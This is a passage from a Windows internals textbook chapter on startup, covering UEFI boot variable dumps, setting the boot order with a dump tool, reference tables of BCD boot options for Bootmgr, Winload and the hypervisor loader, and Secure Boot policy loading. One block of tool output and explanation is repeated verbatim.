Attributes: 0x06 ( BS RT )
Data size : 2 bytes
Data:
00 00
|
EFI Variable “Boot0002”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 78 bytes
Data:
01 00 00 00 2C 00 55 00 53 00 42 00 20 00 53 00 | , U S B S
74 00 6F 00 72 00 61 00 67 00 65 00 00 00 04 07 | t o r a g e
14 00 67 D5 81 A8 B0 6C EE 4E 84 35 2E 72 D3 3E | gü¿ l Nä5.r >
45 B5 04 06 14 00 71 00 67 50 8F 47 E7 4B AD 13 | E q gPÅG K¡
87 54 F3 79 C6 2F 7F FF 04 00 55 53 42 00 | çT≤y / USB
EFI Variable “Boot0000”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 300 bytes
Data:
01 00 00 00 74 00 57 00 69 00 6E 00 64 00 6F 00 | t W I n d o
77 00 73 00 20 00 42 00 6F 00 6F 00 74 00 20 00 | w s B o o t
4D 00 61 00 6E 00 61 00 67 00 65 00 72 00 00 00 | M a n a g e r
04 01 2A 00 02 00 00 00 00 A0 0F 00 00 00 00 00 | * á
00 98 0F 00 00 00 00 00 84 C4 AF 4D 52 3B 80 44 | ÿ ä »MR;ÇD
98 DF 2C A4 93 AB 30 B0 02 02 04 04 46 00 5C 00 | ÿ ,ñô½0 F \
45 00 46 00 49 00 5C 00 4D 00 69 00 63 00 72 00 | E F I \ M i c r
6F 00 73 00 6F 00 66 00 74 00 5C 00 42 00 6F 00 | o s o f t \ B o
6F 00 74 00 5C 00 62 00 6F 00 6F 00 74 00 6D 00 | o t \ b o o t m
67 00 66 00 77 00 2E 00 65 00 66 00 69 00 00 00 | g f w . e f i
7F FF 04 00 57 49 4E 44 4F 57 53 00 01 00 00 00 | WINDOWS
88 00 00 00 78 00 00 00 42 00 43 00 44 00 4F 00 | ê x B C D O
42 00 4A 00 45 00 43 00 54 00 3D 00 7B 00 39 00 | B J E C T = { 9
64 00 65 00 61 00 38 00 36 00 32 00 63 00 2D 00 | d e a 8 6 2 c -
35 00 63 00 64 00 64 00 2D 00 34 00 65 00 37 00 | 5 c d d - 4 e 7
30 00 2D 00 61 00 63 00 63 00 31 00 2D 00 66 00 | 0 - a c c 1 - f
33 00 32 00 62 00 33 00 34 00 34 00 64 00 34 00 | 3 2 b 3 4 4 d 4
37 00 39 00 35 00 7D 00 00 00 6F 00 01 00 00 00 | 7 9 5 } o
10 00 00 00 04 00 00 00 7F FF 04 00
|
EFI Variable "BootOrder"
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 8 bytes
Data:
02 00 00 00 01 00 03 00
|
<Full output cut for space reasons>
788
CHAPTER 12
Startup and shutdown
The tool can even interpret the content of each boot variable. You can launch it using the
/enumboot parameter:
C:\Tools>UefiTool.exe /enumboot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
System Boot Configuration
Number of the Boot entries: 4
Current active entry: 0
Order: 2, 0, 1, 3
Boot Entry #2
Type: Active
Description: USB Storage
Boot Entry #0
Type: Active
Description: Windows Boot Manager
Path: Harddisk0\Partition2 [LBA: 0xFA000]\\EFI\Microsoft\Boot\bootmgfw.efi
OS Boot Options: BCDOBJECT={9dea862c-5cdd-4e70-acc1-f32b344d4795}
Boot Entry #1
Type: Active
Description: Internal Storage
Boot Entry #3
Type: Active
Description: PXE Network
When the tool is able to parse the boot path, it prints the relative Path line (the same applies
for the Winload OS load options). The UEFI specifications define different interpretations for
the path field of a boot entry, which are dependent on the hardware interface. You can change
your system boot order by simply setting the value of the BootOrder variable, or by using the
/setbootorder command-line parameter. Keep in mind that this could invalidate the BitLocker
Volume master key. (We explain this concept later in this chapter in the “Measured Boot” section):
C:\Tools>UefiTool.exe /setvar bootorder {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
0300020000000100
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: YES
Warning, The "bootorder" firmware variable already exist.
Overwriting it could potentially invalidate the system Bitlocker Volume Master Key.
Make sure that you have made a copy of the System volume Recovery Key.
Are you really sure that you would like to continue and overwrite its content? [Y/N] y
The "bootorder" firmware variable has been successfully written.
The tool can even interpret the content of each boot variable. You can launch it using the
/enumboot parameter:
C:\Tools>UefiTool.exe /enumboot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
System Boot Configuration
Number of the Boot entries: 4
Current active entry: 0
Order: 2, 0, 1, 3
Boot Entry #2
Type: Active
Description: USB Storage
Boot Entry #0
Type: Active
Description: Windows Boot Manager
Path: Harddisk0\Partition2 [LBA: 0xFA000]\\EFI\Microsoft\Boot\bootmgfw.efi
OS Boot Options: BCDOBJECT={9dea862c-5cdd-4e70-acc1-f32b344d4795}
Boot Entry #1
Type: Active
Description: Internal Storage
Boot Entry #3
Type: Active
Description: PXE Network
When the tool is able to parse the boot path, it prints the relative Path line (the same applies
for the Winload OS load options). The UEFI specifications define different interpretations for
the path field of a boot entry, which are dependent on the hardware interface. You can change
your system boot order by simply setting the value of the BootOrder variable, or by using the
/setbootorder command-line parameter. Keep in mind that this could invalidate the BitLocker
Volume master key. (We explain this concept later in this chapter in the “Measured Boot” section):
C:\Tools>UefiTool.exe /setvar bootorder {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
0300020000000100
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: YES
Warning, The "bootorder" firmware variable already exist.
Overwriting it could potentially invalidate the system Bitlocker Volume Master Key.
Make sure that you have made a copy of the System volume Recovery Key.
Are you really sure that you would like to continue and overwrite its content? [Y/N] y
The "bootorder" firmware variable has been successfully written.
CHAPTER 12
Startup and shutdown
789
After the Application Parameters data structure has been built and all the boot paths retrieved
(\EFI\Microsoft\Boot is the main working directory), the Boot Manager opens and parses the Boot
Configuration Data file. This file internally is a registry hive that contains all the boot application de-
scriptors and is usually mapped in an HKLM\BCD00000000 virtual key after the system has completely
started. The Boot Manager uses the boot library to open and read the BCD file. The library uses EFI ser-
vices to read and write physical sectors from the hard disk and, at the time of this writing, implements
a light version of various file systems, such as NTFS, FAT, ExFAT, UDFS, El Torito, and virtual file systems
that support Network Boot I/O, VMBus I/O (for Hyper-V virtual machines), and WIM images I/O. The
Boot Configuration Data hive is parsed, the BCD object that describes the Boot Manager is located
(through its GUID), and all the entries that represent boot arguments are added to the startup section
of the Application Parameters data structure. Entries in the BCD can include optional arguments that
Bootmgr, Winload, and other components involved in the boot process interpret. Table 12-2 contains
a list of these options and their effects for Bootmgr, Table 12-3 shows a list of BCD options available to
all boot applications, and Table 12-4 shows BCD options for the Windows boot loader. Table 12-5 shows
BCD options that control the execution of the Windows Hypervisor.
TABLE 12-2 BCD options for the Windows Boot Manager (Bootmgr)
Readable name
Values
BCD Element Code1
Meaning
bcdfilepath
Path
BCD_FILEPATH
Points to the BCD (usually \Boot\BCD) file on
the disk.
displaybootmenu
Boolean
DISPLAY_BOOT_MENU
Determines whether the Boot Manager
shows the boot menu or picks the default
entry automatically.
noerrordisplay
Boolean
NO_ERROR_DISPLAY
Silences the output of errors encountered by
the Boot Manager.
resume
Boolean
ATTEMPT_RESUME
Specifies whether resuming from hiberna-
tion should be attempted. This option is
automatically set when Windows hibernates.
timeout
Seconds
TIMEOUT
Number of seconds that the Boot Manager
should wait before choosing the default entry.
resumeobject
GUID
RESUME_OBJECT
Identifier for which boot application
should be used to resume the system after
hibernation.
displayorder
List
DISPLAY_ORDER
Definition of the Boot Manager’s display
order list.
toolsdisplayorder
List
TOOLS_DISPLAY_ORDER
Definition of the Boot Manager’s tool display
order list.
bootsequence
List
BOOT_SEQUENCE
Definition of the one-time boot sequence.
default
GUID
DEFAULT_OBJECT
The default boot entry to launch.
customactions
List
CUSTOM_ACTIONS_LIST
Definition of custom actions to take when
a specific keyboard sequence has been
entered.
processcustomactions-
first
Boolean
PROCESS_CUSTOM
_ACTIONS_FIRST
Specifies whether the Boot Manager
should run custom actions prior to the
boot sequence.
bcddevice
GUID
BCD_DEVICE
Device ID of where the BCD store is located.
790
CHAPTER 12
Startup and shutdown
Readable name
Values
BCD Element Code1
Meaning
hiberboot
Boolean
HIBERBOOT
Indicates whether this boot was a hybrid boot.
fverecoveryurl
String
FVE_RECOVERY_URL
Specifies the BitLocker recovery URL string.
fverecoverymessage
String
FVE_RECOVERY
_MESSAGE
Specifies the BitLocker recovery message
string.
flightedbootmgr
Boolean
BOOT_FLIGHT
_BOOTMGR
Specifies whether execution should proceed
through a flighted Bootmgr.
1 All the Windows Boot Manager BCD element codes start with BCDE_BOOTMGR_TYPE, but that has been omitted due to limited space.
TABLE 12-3 BCD library options for boot applications (valid for all object types)
Readable Name
Values
BCD Element Code2
Meaning
advancedoptions
Boolean
DISPLAY_ADVANCED
_OPTIONS
If false, executes the default behavior of
launching the auto-recovery command
boot entry when the boot fails; otherwise,
displays the boot error and offers the user
the advanced boot option menu associated
with the boot entry. This is equivalent to
pressing F8.
avoidlowmemory
Integer
AVOID_LOW_PHYSICAL
_MEMORY
Forces physical addresses below the speci-
fied value to be avoided by the boot loader
as much as possible. Sometimes required
on legacy devices (such as ISA) where only
memory below 16 MB is usable or visible.
badmemoryaccess
Boolean
ALLOW_BAD_MEMORY
_ACCESS
Forces usage of memory pages in the Bad
Page List (see Part 1, Chapter 5, “Memory
management,” for more information on the
page lists).
badmemorylist
Array of page frame
numbers (PFNs)
BAD_MEMORY_LIST
Specifies a list of physical pages on the
system that are known to be bad because
of faulty RAM.
baudrate
Baud rate in bps
DEBUGGER_BAUDRATE
Specifies an override for the default baud
rate (19200) at which a remote kernel debug-
ger host will connect through a serial port.
bootdebug
Boolean
DEBUGGER_ENABLED
Enables remote boot debugging for the
boot loader. With this option enabled, you
can use Kd.exe or Windbg.exe to connect to
the boot loader.
bootems
Boolean
EMS_ENABLED
Causes Windows to enable Emergency
Management Services (EMS) for boot appli-
cations, which reports boot information and
accepts system management commands
through a serial port.
busparams
String
DEBUGGER_BUS
_PARAMETERS
If a physical PCI debugging device is used
to provide kernel debugging, specifies the
PCI bus, function, and device number (or the
ACPI DBG table index) for the device.
channel
Channel between 0
and 62
DEBUGGER_1394
_CHANNEL
Used in conjunction with <debugtype> 1394
to specify the IEEE 1394 channel through
which kernel debugging communications
will flow.
CHAPTER 12
Startup and shutdown
791
Readable Name
Values
BCD Element Code2
Meaning
configaccesspolicy
Default,
DisallowMmConfig
CONFIG_ACCESS
_POLICY
Configures whether the system uses
memory-mapped I/O to access the PCI
manufacturer’s configuration space or falls
back to using the HAL’s I/O port access rou-
tines. Can sometimes be helpful in solving
platform device problems.
debugaddress
Hardware address
DEBUGGER_PORT
_ADDRESS
Specifies the hardware address of the serial
(COM) port used for debugging.
debugport
COM port number
DEBUGGER_PORT
_NUMBER
Specifies an override for the default serial
port (usually COM2 on systems with at least
two serial ports) to which a remote kernel
debugger host is connected.
debugstart
Active, AutoEnable,
Disable
DEBUGGER_START
_POLICY
Specifies settings for the debugger when ker-
nel debugging is enabled. AutoEnable enables
the debugger when a breakpoint or kernel
exception, including kernel crashes, occurs.
debugtype
Serial, 1394, USB, or Net
DEBUGGER_TYPE
Specifies whether kernel debugging will be
communicated through a serial, FireWire (IEEE
1394), USB, or Ethernet port. (The default is
serial.)
hostip
Ip address
DEBUGGER_NET
_HOST_IP
Specifies the target IP address to connect
to when the kernel debugger is enabled
through Ethernet.
port
Integer
DEBUGGER_NET_PORT
Specifies the target port number to connect
to when the kernel debugger is enabled
through Ethernet.
key
String
DEBUGGER_NET_KEY
Specifies the encryption key used for en-
crypting debugger packets while using the
kernel Debugger through Ethernet.
emsbaudrate
Baud rate in bps
EMS_BAUDRATE
Specifies the baud rate to use for EMS.
emsport
COM port number
EMS_PORT_NUMBER
Specifies the serial (COM) port to use for EMS.
extendedinput
Boolean
CONSOLE_EXTENDED
_INPUT
Enables boot applications to leverage BIOS
support for extended console input.
keyringaddress
Physical address
FVE_KEYRING_ADDRESS
Specifies the physical address where the
BitLocker key ring is located.
firstmegabytepolicy
UseNone, UseAll,
UsePrivate
FIRST_MEGABYTE
_POLICY
Specifies how the low 1 MB of physical memory
is consumed by the HAL to mitigate corrup-
tions by the BIOS during power transitions.
fontpath
String
FONT_PATH
Specifies the path of the OEM font that
should be used by the boot application.
graphicsmodedisabled
Boolean
GRAPHICS_MODE
_DISABLED
Disables graphics mode for boot applications.
graphicsresolution
Resolution
GRAPHICS_RESOLUTION
Sets the graphics resolution for boot
applications.
initialconsoleinput
Boolean
INITIAL_CONSOLE
_INPUT
Specifies an initial character that the system
inserts into the PC/ AT keyboard input buffer.
integrityservices
Default, Disable, Enable
SI_POLICY
Enables or disables code integrity ser-
vices, which are used by Kernel Mode Code
Signing. Default is Enabled.
792
CHAPTER 12
Startup and shutdown
Readable Name
Values
BCD Element Code2
Meaning
locale
Localization string
PREFERRED_LOCALE
Sets the locale for the boot application (such
as EN-US).
noumex
Boolean
DEBUGGER_IGNORE_
USERMODE_EXCEPTIONS
Disables user-mode exceptions when kernel
debugging is enabled. If you experience
system hangs (freezes) when booting in de-
bugging mode, try enabling this option.
recoveryenabled
Boolean
AUTO_RECOVERY
_ENABLED
Enables the recovery sequence, if any. Used
by fresh installations of Windows to pres-
ent the Windows PE-based Startup And
Recovery interface.
recoverysequence
List
RECOVERY_SEQUENCE
Defines the recovery sequence (described
earlier).
relocatephysical
Physical address
RELOCATE_PHYSICAL
_MEMORY
Relocates an automatically selected NUMA
node’s physical memory to the specified
physical address.
targetname
String
DEBUGGER_USB
_TARGETNAME
Defines the target name for the USB debug-
ger when used with USB2 or USB3 debug-
ging (debugtype is set to USB).
testsigning
Boolean
ALLOW_PRERELEASE
_SIGNATURES
Enables test-signing mode, which allows
driver developers to load locally signed
64-bit drivers. This option results in a water-
marked desktop.
truncatememory
Address in bytes
TRUNCATE_PHYSICAL
_MEMORY
Disregards physical memory above the
specified physical address.
2 All the BCD elements codes for Boot Applications start with BCDE_LIBRARY_TYPE, but that has been omitted due to limited space.
TABLE 12-4 BCD options for the Windows OS Loader (Winload)
BCD Element
Values
BCD Element Code3
Meaning
bootlog
Boolean
LOG_INITIALIZATION
Causes Windows to write a log of the boot to
the file %SystemRoot%\Ntbtlog.txt.
bootstatuspolicy
DisplayAllFailures,
ignoreAllFailures,
IgnoreShutdownFailures,
IgnoreBootFailures
BOOT_STATUS_POLICY
Overrides the system’s default behavior of
offering the user a troubleshooting boot
menu if the system didn’t complete the pre-
vious boot or shutdown.
bootux
Disabled, Basic, Standard
BOOTUX_POLICY
Defines the boot graphics user experience
that the user will see. Disabled means that
no graphics will be seen during boot time
(only a black screen), while Basic will display
only a progress bar during load. Standard
displays the usual Windows logo animation
during boot.
bootmenupolicy
Legacy
Standard
BOOT_MENU_POLICY
Specify the type of boot menu to show in
case of multiple boot entries (see “The boot
menu” section later in this chapter).
clustermodeaddressing
Number of processors
CLUSTERMODE
_ADDRESSING
Defines the maximum number of processors
to include in a single Advanced Programmable
Interrupt Controller (APIC) cluster.
configflags
Flags
PROCESSOR_
CONFIGURATION_FLAGS
Specifies processor-specific configuration
flags.
CHAPTER 12
Startup and shutdown
793
BCD Element
Values
BCD Element Code3
Meaning
dbgtransport
Transport image name
DBG_TRANSPORT_PATH
Overrides using one of the default kernel
debugging transports (Kdcom.dll, Kd1394,
Kdusb.dll) and instead uses the given file,
permitting specialized debugging transports
to be used that are not typically supported
by Windows.
debug
Boolean
KERNEL_DEBUGGER
_ENABLED
Enables kernel-mode debugging.
detecthal
Boolean
DETECT_KERNEL_AND
_HAL
Enables the dynamic detection of the HAL.
driverloadfailurepolicy
Fatal, UseErrorControl
DRIVER_LOAD_FAILURE
_POLICY
Describes the loader behavior to use when
a boot driver has failed to load. Fatal will
prevent booting, whereas UseErrorControl
causes the system to honor a driver’s default
error behavior, specified in its service key.
ems
Boolean
KERNEL_EMS_ENABLED
Instructs the kernel to use EMS as well. (If
only bootems is used, only the boot loader
will use EMS.)
evstore
String
EVSTORE
Stores the location of a boot preloaded hive.
groupaware
Boolean
FORCE_GROUP
_AWARENESS
Forces the system to use groups other than
zero when associating the group seed to new
processes. Used only on 64-bit Windows.
groupsize
Integer
GROUP_SIZE
Forces the maximum number of logical
processors that can be part of a group (maxi-
mum of 64). Can be used to force groups to
be created on a system that would normally
not require them to exist. Must be a power
of 2 and is used only on 64-bit Windows.
hal
HAL image name
HAL_PATH
Overrides the default file name for the HAL
image (Hal.dll). This option can be useful
when booting a combination of a checked
HAL and checked kernel (requires specifying
the kernel element as well).
halbreakpoint
Boolean
DEBUGGER_HAL
_BREAKPOINT
Causes the HAL to stop at a breakpoint early in
HAL initialization. The first thing the Windows
kernel does when it initializes is to initialize
the HAL, so this breakpoint is the earliest one
possible (unless boot debugging is used). If the
switch is used without the /DEBUG switch, the
system will present a blue screen with a STOP
code of 0x00000078 (PHASE0_ EXCEPTION).
novesa
Boolean
BCDE_OSLOADER_TYPE
_DISABLE_VESA_BIOS
Disables the usage of VESA display modes.
optionsedit
Boolean
OPTIONS_EDIT_ONE
_TIME
Enables the options editor in the Boot
Manager. With this option, Boot Manager
allows the user to interactively set on-demand
command-line options and switches for the
current boot. This is equivalent to pressing F10.
osdevice
GUID
OS_DEVICE
Specifies the device on which the operating
system is installed.
794
CHAPTER 12
Startup and shutdown
BCD Element
Values
BCD Element Code3
Meaning
pae
Default, ForceEnable,
ForceDisable
PAE_POLICY
Default allows the boot loader to determine
whether the system supports PAE and loads
the PAE kernel. ForceEnable forces this be-
havior, while ForceDisable forces the loader
to load the non-PAE version of the Windows
kernel, even if the system is detected as
supporting x86 PAEs and has more than 4
GB of physical memory. However, non-PAE
x86 kernels are not supported anymore in
Windows 10.
pciexpress
Default, ForceDisable
PCI_EXPRESS_POLICY
Can be used to disable support for PCI
Express buses and devices.
perfmem
Size in MB
PERFORMANCE_DATA
_MEMORY
Size of the buffer to allocate for perfor-
mance data logging. This option acts simi-
larly to the removememory element, since
it prevents Windows from seeing the size
specified as available memory.
quietboot
Boolean
DISABLE_BOOT_DISPLAY
Instructs Windows not to initialize the VGA
video driver responsible for presenting bit-
mapped graphics during the boot process.
The driver is used to display boot progress
information, so disabling it disables the abil-
ity of Windows to show this information.
ramdiskimagelength
Length in bytes
RAMDISK_IMAGE
_LENGTH
Size of the ramdisk specified.
ramdiskimageoffset
Offset in bytes
RAMDISK_IMAGE
_OFFSET
If the ramdisk contains other data (such as
a header) before the virtual file system, in-
structs the boot loader where to start read-
ing the ramdisk file from.
ramdisksdipath
Image file name
RAMDISK_SDI_PATH
Specifies the name of the SDI ramdisk to load.
ramdisktftpblocksize
Block size
RAMDISK_TFTP_BLOCK
_SIZE
If loading a WIM ramdisk from a network
Trivial FTP (TFTP) server, specifies the block
size to use.
ramdisktftpclientport
Port number
RAMDISK_TFTP_CLIENT
_PORT
If loading a WIM ramdisk from a network
TFTP server, specifies the port.
ramdisktftpwindowsize
Window size
RAMDISK_TFTP_
WINDOW_SIZE
If loading a WIM ramdisk from a network
TFTP server, specifies the window size to use.
removememory
Size in bytes
REMOVE_MEMORY
Specifies an amount of memory Windows
won’t use.
restrictapiccluster
Cluster number
RESTRICT_APIC_CLUSTER
Defines the largest APIC cluster number to
be used by the system.
resumeobject
Object GUID
ASSOCIATED_RESUME
_OBJECT
Describes which application to use for
resuming from hibernation, typically
Winresume.exe.
safeboot
Minimal, Network,
DsRepair
SAFEBOOT
Specifies options for a safe-mode boot.
Minimal corresponds to safe mode without
networking, Network to safe mode with
networking, and DsRepair to safe mode with
Directory Services Restore mode. (See the
“Safe mode” section later in this chapter.)
CHAPTER 12
Startup and shutdown
795
BCD Element
Values
BCD Element Code3
Meaning
safebootalternateshell
Boolean
SAFEBOOT_ALTERNATE
_SHELL
Tells Windows to use the program specified
by the HKLM\SYSTEM\CurrentControlSet\
Control\SafeBoot\AlternateShell value as the
graphical shell rather than the default, which
is Windows Explorer. This option is referred
to as safe mode with command prompt in
the alternate boot menu.
sos
Boolean
SOS
Causes Windows to list the device drivers
marked to load at boot time and then to
display the system version number (includ-
ing the build number), amount of physical
memory, and number of processors.
systemroot
String
SYSTEM_ROOT
Specifies the path, relative to osdevice, in
which the operating system is installed.
targetname
Name
KERNEL_DEBUGGER
_USB_TARGETNAME
For USB debugging, assigns a name to the
machine that is being debugged.
tpmbootentropy
Default, ForceDisable,
ForceEnable
TPM_BOOT_ENTROPY
_POLICY
Forces a specific TPM Boot Entropy policy to
be selected by the boot loader and passed
on to the kernel. TPM Boot Entropy, when
used, seeds the kernel’s random number
generator (RNG) with data obtained from
the TPM (if present).
usefirmwarepcisettings
Boolean
USE_FIRMWARE_PCI
_SETTINGS
Stops Windows from dynamically assigning
IO/IRQ resources to PCI devices and leaves
the devices configured by the BIOS. See
Microsoft Knowledge Base article 148501 for
more information.
uselegacyapicmode
Boolean
USE_LEGACY_APIC
_MODE
Forces usage of basic APIC functionality
even though the chipset reports extended
APIC functionality as present. Used in cases
of hardware errata and/or incompatibility.
usephysicaldestination
Boolean
USE_PHYSICAL_
DESTINATION,
Forces the use of the APIC in physical desti-
nation mode.
useplatformclock
Boolean
USE_PLATFORM_CLOCK
Forces usage of the platforms’s clock source
as the system’s performance counter.
vga
Boolean
USE_VGA_DRIVER
Forces Windows to use the VGA display
driver instead of the third-party high-per-
formance driver.
winpe
Boolean
WINPE
Used by Windows PE, this option causes the
configuration manager to load the registry
SYSTEM hive as a volatile hive such that
changes made to it in memory are not saved
back to the hive image.
x2apicpolicy
Disabled, Enabled,
Default
X2APIC_POLICY
Specifies whether extended APIC func-
tionality should be used if the chipset sup-
ports it. Disabled is equivalent to setting
uselegacyapicmode, whereas Enabled forces
ACPI functionality on even if errata are de-
tected. Default uses the chipset’s reported
capabilities (unless errata are present).
xsavepolicy
Integer
XSAVEPOLICY
Forces the given XSAVE policy to be loaded
from the XSAVE Policy Resource Driver
(Hwpolicy.sys).
796
CHAPTER 12
Startup and shutdown
BCD Element
Values
BCD Element Code3
Meaning
xsaveaddfeature0-7
Integer
XSAVEADDFEATURE0-7
Used while testing support for XSAVE on
modern Intel processors; allows for faking
that certain processor features are pres-
ent when, in fact, they are not. This helps
increase the size of the CONTEXT structure
and confirms that applications work correct-
ly with extended features that might appear
in the future. No actual extra functionality
will be present, however.
xsaveremovefeature
Integer
XSAVEREMOVEFEATURE
Forces the entered XSAVE feature not to
be reported to the kernel, even though the
processor supports it.
xsaveprocessorsmask
Integer
XSAVEPROCESSORSMASK
Bitmask of which processors the XSAVE
policy should apply to.
xsavedisable
Boolean
XSAVEDISABLE
Turns off support for the XSAVE functionality
even though the processor supports it.
3 All the BCD elements codes for the Windows OS Loader start with BCDE_OSLOADER_TYPE, but this has been omitted due to limited space.
TABLE 12-5 BCD options for the Windows Hypervisor loader (hvloader)
BCD Element
Values
BCD Element Code4
Meaning
hypervisorlaunchtype
Off
Auto
HYPERVISOR_LAUNCH
_TYPE
Enables loading of the hypervisor on a
Hyper-V system or forces it to be disabled.
hypervisordebug
Boolean
HYPERVISOR_
DEBUGGER_ENABLED
Enables or disables the Hypervisor
Debugger.
hypervisordebugtype
Serial
1394
None
Net
HYPERVISOR_
DEBUGGER_TYPE
Specifies the Hypervisor Debugger type
(through a serial port or through an IEEE-
1394 or network interface).
hypervisoriommupolicy
Default
Enable
Disable
HYPERVISOR_IOMMU
_POLICY
Enables or disables the hypervisor DMA
Guard, a feature that blocks direct memory
access (DMA) for all hot-pluggable PCI ports
until a user logs in to Windows.
hypervisormsrfilterpolicy
Disable
Enable
HYPERVISOR_MSR
_FILTER_POLICY
Controls whether the root partition is al-
lowed to access restricted MSRs (model
specific registers).
hypervisormmionxpolicy
Disable
Enable
HYPERVISOR_MMIO
_NX_POLICY
Enables or disables the No-Execute (NX)
protection for UEFI runtime service code and
data memory regions.
hypervisorenforced-
codeintegrity
Disable
Enable
Strict
HYPERVISOR
_ENFORCED_CODE
_INTEGRITY
Enables or disables the Hypervisor Enforced
Code Integrity (HVCI), a feature that pre-
vents the root partition kernel from allocat-
ing unsigned executable memory pages.
hypervisorschedulertype
Classic
Core
Root
HYPERVISOR
_SCHEDULER_TYPE
Specifies the hypervisor’s partitions sched-
uler type.
hypervisordisableslat
Boolean
HYPERVISOR_SLAT_DISA
BLED
Forces the hypervisor to ignore the pres-
ence of the second layer address translation
(SLAT) feature if supported by the processor.
hypervisornumproc
Integer
HYPERVISOR_NUM
_PROC
Specifies the maximum number of logical
processors available to the hypervisor.
CHAPTER 12
Startup and shutdown
797
BCD Element
Values
BCD Element Code4
Meaning
hypervisorrootprocper-
node
Integer
HYPERVISOR_ROOT
_PROC_PER_NODE
Specifies the total number of root virtual
processors per node.
hypervisorrootproc
Integer
HYPERVISOR_ROOT
_PROC
Specifies the maximum number of virtual
processors in the root partition.
hypervisorbaudrate
Baud rate in bps
HYPERVISOR_
DEBUGGER_BAUDRATE
If using serial hypervisor debugging, speci-
fies the baud rate to use.
hypervisorchannel
Channel number from
0 to 62
HYPERVISOR
_DEBUGGER_1394
_CHANNEL
If using FireWire (IEEE 1394) hypervisor de-
bugging, specifies the channel number to use.
hypervisordebugport
COM port number
HYPERVISOR_
DEBUGGER_PORT_
NUMBER
If using serial hypervisor debugging, speci-
fies the COM port to use.
hypervisoruselargevtlb
Boolean
HYPERVISOR_USE_
LARGE_VTLB
Enables the hypervisor to use a larger num-
ber of virtual TLB entries.
hypervisorhostip
IP address (binary for-
mat)
HYPERVISOR_
DEBUGGER_NET_HOST_
IP
Specifies the IP address of the target ma-
chine (the debugger) used in hypervisor
network debugging.
hypervisorhostport
Integer
HYPERVISOR_
DEBUGGER_NET_HOST_
PORT
Specifies the network port used in hypervisor
network debugging.
hypervisorusekey
String
HYPERVISOR_
DEBUGGER_NET_KEY
Specifies the encryption key used for en-
crypting the debug packets sent through
the wire.
hypervisorbusparams
String
HYPERVISOR_
DEBUGGER_BUSPARAMS
Specifies the bus, device, and function num-
bers of the network adapter used for hyper-
visor debugging.
hypervisordhcp
Boolean
HYPERVISOR_
DEBUGGER_NET_DHCP
Specifies whether the Hypervisor Debugger
should use DHCP for getting the network
interface IP address.
4 All the BCD elements codes for the Windows Hypervisor Loader start with BCDE_OSLOADER_TYPE, but this has been omitted due to limited space.
All the entries in the BCD store play a key role in the startup sequence. Inside each boot entry (a boot
entry is a BCD object), there are listed all the boot options, which are stored into the hive as registry
subkeys (as shown in Figure 12-5). These options are called BCD elements. The Windows Boot Manager
is able to add or remove any boot option, either in the physical hive or only in memory. This is important
because, as we describe later in the section “The boot menu,” not all the BCD options need to reside in the
physical hive.
If the Boot Configuration Data hive is corrupt, or if some error has occurred while parsing its boot
entries, the Boot Manager retries the operation using the Recovery BCD hive. The Recovery BCD hive is
normally stored in \EFI\Microsoft\Recovery\BCD. The system could be configured for direct use of this
store, skipping the normal one, via the recoverybcd parameter (stored in the UEFI boot variable) or via
the Bootstat.log file.
798
CHAPTER 12
Startup and shutdown
FIGURE 12-5 An example screenshot of the Windows Boot Manager’s BCD objects and their associated boot
options (BCD elements).
The system is ready to load the Secure Boot policies, show the boot menu (if needed), and launch
the boot application. The list of boot certificates that the firmware can or cannot trust is located in the
db and dbx UEFI authenticated variables. The code integrity boot library reads and parses the UEFI
variables, but these control only whether a particular boot manager module can be loaded. Once the
Windows Boot Manager is launched, it enables you to further customize or extend the UEFI-supplied
Secure Boot configuration with a Microsoft-provided certificates list. The Secure Boot policy file (stored
in \EFI\Microsoft\Boot\SecureBootPolicy.p7b), the platform manifest polices files (.pm files), and the
supplemental policies (.pol files) are parsed and merged with the policies stored in the UEFI variables.
Because the kernel code integrity engine ultimately takes over, the additional policies contain OS-
specific information and certificates. In this way, a secure edition of Windows (like the S version) could
verify multiple certificates without consuming precious UEFI resources. This creates the root of trust be-
cause the files that specify new customized certificates lists are signed by a digital certificate contained
in the UEFI allowed signatures database.
If not disabled by boot options (nointegritycheck or testsigning) or by a Secure Boot policy, the Boot
Manager performs a self-verification of its own integrity: it opens its own file from the hard disk and
validates its digital signature. If Secure Boot is on, the signing chain is validated against the Secure Boot
signing policies.
The Boot Manager initializes the Boot Debugger and checks whether it needs to display an OEM
bitmap (through the BGRT system ACPI table). If so, it clears the screen and shows the logo. If Windows
has enabled the BCD setting to inform Bootmgr of a hibernation resume (or of a hybrid boot), this
shortcuts the boot process by launching the Windows Resume Application, Winresume.efi, which will
read the contents of the hibernation file into memory and transfer control to code in the kernel that
CHAPTER 12
Startup and shutdown
799
resumes a hibernated system. That code is responsible for restarting drivers that were active when the
system was shut down. Hiberfil.sys is valid only if the last computer shutdown was a hibernation or a
hybrid boot. This is because the hibernation file is invalidated after a resume to avoid multiple resumes
from the same point. The Windows Resume Application BCD object is linked to the Boot Manager
descriptor through a specific BCD element (called resumeobject, which is described in the “Hibernation
and Fast Startup” section later in this chapter).
Bootmgr detects whether OEM custom boot actions are registered through the relative BCD ele-
ment, and, if so, processes them. At the time of this writing, the only custom boot action supported is
the launch of an OEM boot sequence. In this way the OEM vendors can register a customized recovery
sequence invoked through a particular key pressed by the user at startup.
The boot menu
In Windows 8 and later, in the standard boot configurations, the classical (legacy) boot menu is
never shown because a new technology, modern boot, has been introduced. Modern boot provides
Windows with a rich graphical boot experience while maintaining the ability to dive more deeply into
boot-related settings. In this configuration, the final user is able to select the OS that they want to ex-
ecute, even with touch-enabled systems that don’t have a proper keyboard and mouse. The new boot
